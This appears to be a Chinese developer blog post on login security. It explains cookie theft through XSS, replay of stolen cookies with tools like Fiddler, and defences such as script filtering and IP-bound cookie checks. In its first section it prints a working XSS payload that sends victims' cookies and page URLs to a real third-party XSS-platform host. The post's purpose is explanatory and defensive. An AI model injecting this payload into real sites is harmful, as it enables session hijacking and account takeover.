web开发中，避免不了开发用户登录功能，但是有多少知道用户登录的一些安全防范技术呢？

初级开发者只知道把用户信息保存到Cookie即可，登录只管判断Cookie是否存在，凭借着cookie值的存在情况来判断用户是否登录， 更有一些甚至把用户密码也保存在Cookie中，这都是极其危险的，黑客分分钟可以模拟你的Cookie来登录你的用户，做一些危险的事情。

1、攻击者如何拿到你的登录的Cookie值。

现在各种攻击技术，XSS攻击方式就是其中一种 黑客在可以提交表单信息的地方各种尝试提交攻击脚本，XSS攻击脚本代码如下：

(function(){(new Image()).src='https://xsshs.cn/xss.php?do=api&id=mcw4&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xsshs.cn/xss.php?do=keepsession&id=mcw4&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

这段代码，是通过第三方XSS平台来的，目前有许多的免费XSS平台。 通过嵌入以上脚本，只要用户登录了自己的帐号，一旦浏览了攻击者发布的脚本页面，即攻击成功， XSS第三方平台里面发送有关用户登录的Cookie给攻击者，这样你登录的Cookie值立马被窃取

2、攻击者模拟Cookie登录

做过后台开发的人都知道怎么模拟Cookie信息去登录，或使用一些工具，比如Fiddler，Mantra浏览器，很容易把Cookie信息模拟登录了， 通过简单的模拟用户的Cookie就可以分分钟使用你的帐号登录了，并做一些危险的动作，比如删除你的东西，以及更多危险的操作。

3、接下来怎么防止这种攻击呢

A、网站本身做一些脚本拦截，以及脚本检验工作 比如web站点使用过富文本，一般富文本默认都会对脚本进行拦截，但是有些需要是需要开启这个用户引用脚本的，针对这些用户输入引用的脚本做安全的验证工作，检查风险性，对于风险脚本进行拦截处理，不让提交等。这样就可以在用户输入层避免了XSS攻击的来源了。

B、Cookie层本身做正确性校验，后台判断是否登录做严格的验证校验工作，不仅仅只判断Cookie是否存在，而要做严格的正确性验证， 可以以IP校验的方式来验证是否是有效登录。 可以把用户请求的IP值和用户的唯一ID做一个特殊加密处理，这样Cookie信息中包含了用户登录的IP地址，这是很多大型网站都是这样做的安全登录，大家应该见过一些金融产品，如果换了一个网络，是不是提示要重新登录呢？这就是根据IP地址校验来防止攻击。 Cookie值中保存了用户的IP值，这样每次登录的时候判断IP地址和当前请求的IP地址是否一致，如果一致则通过验证，IP不一致则说明是异常登录，验证不通过。

attack-flow

get-info

cookie

login